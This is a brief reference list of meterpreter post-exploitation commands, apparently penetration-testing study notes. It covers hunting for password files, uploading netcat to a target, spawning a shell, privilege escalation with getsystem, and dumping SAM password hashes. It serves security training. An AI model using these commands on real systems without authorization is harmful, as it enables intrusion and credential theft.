meterpreter commands
Useful meterpreter commands:
sysinfo | returns information about the target system |
getuid | returns the uid of the user our meterpreter session is running as |
search | searches the target system for a file/folder (e.g. search -f *pass*.txt) |
upload | uploads a file (e.g. upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec) |
download | downloads a file the target machine to our local machine (e.g. download c:\\Windows\\system32\\calc.exe /tmp/calc.exe) |
shell | spawn a system shell on the target |
ps | display a list of running processes on the target |
migrate | migrate shell to a different running process (e.g. migrate <pid>) |
portfwd | forward a local port to a remote service |
route | view and modify the routing table |
getsystem | attempt to elevate your privilege to that of local system |
hashdump | dumps the contents of the SAM database |
backgorund | background the current session (we can use the sessions command to bring it back to the foreground) |
